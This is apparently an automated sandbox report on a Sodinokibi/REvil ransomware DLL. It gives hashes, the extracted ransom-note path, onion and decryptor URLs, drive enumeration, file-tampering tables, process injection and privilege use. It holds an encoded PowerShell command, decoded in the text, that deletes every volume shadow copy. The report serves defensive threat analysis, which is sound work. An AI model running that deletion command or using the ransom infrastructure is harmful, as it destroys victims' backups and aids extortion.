Analysis
- max time kernel: 91s
- max time network: 127s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 20-06-2022 22:34
Static task: static1
Behavioral task: behavioral1
- Sample: 3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll
- Resource: win7-20220414-en
Behavioral task: behavioral2
- Sample: 3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll
- Resource: win10v2004-20220414-en
General
- Target: 3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll
- Size: 164KB
- MD5: d5e42a58e793d9b488f46d77b38f92af
- SHA1: 433b8d938d3778b07c36b998eff618892e83236e
- SHA256: 3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981
- SHA512: 6de37ca575a7859051ca4db0a8691843a11a437bd0e592ca1da04ddc5380103baea1d0cdc95e3e2f3ac345f35b2479bc6aad1ac81929a45b8219f5931c870b27
Malware Config
Extracted:
- Path: C:\u0o56tez4x-readme.txt
- Family: sodinokibi
- URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/9F0AC63999EFF22F
  - http://decryptor.cc/9F0AC63999EFF22F
Signatures
- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: rundll32.exe

  | description | ioc | process |
  | --- | --- | --- |
  | File opened (read-only) | \??\F: | rundll32.exe |
  | File opened (read-only) | \??\H: | rundll32.exe |
  | File opened (read-only) | \??\J: | rundll32.exe |
  | File opened (read-only) | \??\K: | rundll32.exe |
  | File opened (read-only) | \??\L: | rundll32.exe |
  | File opened (read-only) | \??\O: | rundll32.exe |
  | File opened (read-only) | \??\Q: | rundll32.exe |
  | File opened (read-only) | \??\R: | rundll32.exe |
  | File opened (read-only) | \??\T: | rundll32.exe |
  | File opened (read-only) | \??\U: | rundll32.exe |
  | File opened (read-only) | \??\Z: | rundll32.exe |
  | File opened (read-only) | \??\A: | rundll32.exe |
  | File opened (read-only) | \??\N: | rundll32.exe |
  | File opened (read-only) | \??\S: | rundll32.exe |
  | File opened (read-only) | \??\W: | rundll32.exe |
  | File opened (read-only) | \??\B: | rundll32.exe |
  | File opened (read-only) | \??\I: | rundll32.exe |
  | File opened (read-only) | \??\P: | rundll32.exe |
  | File opened (read-only) | \??\V: | rundll32.exe |
  | File opened (read-only) | \??\E: | rundll32.exe |
  | File opened (read-only) | \??\G: | rundll32.exe |
  | File opened (read-only) | \??\M: | rundll32.exe |
  | File opened (read-only) | \??\X: | rundll32.exe |
  | File opened (read-only) | \??\Y: | rundll32.exe |

- Drops file in Program Files directory (22 IoCs)
  Processes: rundll32.exe

  | description | ioc | process |
  | --- | --- | --- |
  | File opened for modification | \??\c:\program files\ImportSelect.wdp | rundll32.exe |
  | File opened for modification | \??\c:\program files\MeasureRequest.wma | rundll32.exe |
  | File opened for modification | \??\c:\program files\UnpublishConvertTo.ADTS | rundll32.exe |
  | File created | \??\c:\program files (x86)\u0o56tez4x-readme.txt | rundll32.exe |
  | File opened for modification | \??\c:\program files\CheckpointPop.snd | rundll32.exe |
  | File opened for modification | \??\c:\program files\ExitDisable.mhtml | rundll32.exe |
  | File opened for modification | \??\c:\program files\LockConnect.mhtml | rundll32.exe |
  | File opened for modification | \??\c:\program files\MountResolve.dwg | rundll32.exe |
  | File opened for modification | \??\c:\program files\MountCompress.vstm | rundll32.exe |
  | File opened for modification | \??\c:\program files\RepairSync.svgz | rundll32.exe |
  | File opened for modification | \??\c:\program files\SkipUse.dotm | rundll32.exe |
  | File opened for modification | \??\c:\program files\StepCheckpoint.shtml | rundll32.exe |
  | File opened for modification | \??\c:\program files\TestRestore.vssm | rundll32.exe |
  | File opened for modification | \??\c:\program files\RestartWait.MTS | rundll32.exe |
  | File opened for modification | \??\c:\program files\StartStop.M2T | rundll32.exe |
  | File opened for modification | \??\c:\program files\TestAssert.emf | rundll32.exe |
  | File created | \??\c:\program files\u0o56tez4x-readme.txt | rundll32.exe |
  | File opened for modification | \??\c:\program files\ApproveGet.wmv | rundll32.exe |
  | File opened for modification | \??\c:\program files\CheckpointCompress.raw | rundll32.exe |
  | File opened for modification | \??\c:\program files\ImportGet.asf | rundll32.exe |
  | File opened for modification | \??\c:\program files\ImportSkip.mp3 | rundll32.exe |
  | File opened for modification | \??\c:\program files\WatchEdit.tiff | rundll32.exe |

- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: rundll32.exe, powershell.exe

  | pid | process |
  | --- | --- |
  | 2688 | rundll32.exe |
  | 2688 | rundll32.exe |
  | 4500 | powershell.exe |
  | 4500 | powershell.exe |

- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes: rundll32.exe, powershell.exe, vssvc.exe

  | description | pid | process |
  | --- | --- | --- |
  | Token: SeDebugPrivilege | 2688 | rundll32.exe |
  | Token: SeDebugPrivilege | 4500 | powershell.exe |
  | Token: SeBackupPrivilege | 4004 | vssvc.exe |
  | Token: SeRestorePrivilege | 4004 | vssvc.exe |
  | Token: SeAuditPrivilege | 4004 | vssvc.exe |

- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: rundll32.exe, rundll32.exe

  | description | pid | process | target process |
  | --- | --- | --- | --- |
  | PID 3392 wrote to memory of 2688 | 3392 | rundll32.exe | rundll32.exe |
  | PID 3392 wrote to memory of 2688 | 3392 | rundll32.exe | rundll32.exe |
  | PID 3392 wrote to memory of 2688 | 3392 | rundll32.exe | rundll32.exe |
  | PID 2688 wrote to memory of 4500 | 2688 | rundll32.exe | powershell.exe |
  | PID 2688 wrote to memory of 4500 | 2688 | rundll32.exe | powershell.exe |
Processes
- C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll,#1
  - Suspicious use of WriteProcessMemory
  - Child process: C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\3177896e5f53f34670557dfa351e4c73d77a178bc1aa62030dd995d335a9a981.dll,#1
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (The -e argument is base64 of a UTF-16LE string; it decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which deletes every volume shadow copy and accounts for the vssvc.exe activity below.)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/2688-133-0x0000000000000000-mapping.dmp
- memory/4500-134-0x0000000000000000-mapping.dmp
- memory/4500-135-0x000001EF476E0000-0x000001EF47702000-memory.dmp (filesize 136KB)
- memory/4500-136-0x00007FFA587E0000-0x00007FFA592A1000-memory.dmp (filesize 10.8MB)
- memory/4500-137-0x00007FFA587E0000-0x00007FFA592A1000-memory.dmp (filesize 10.8MB)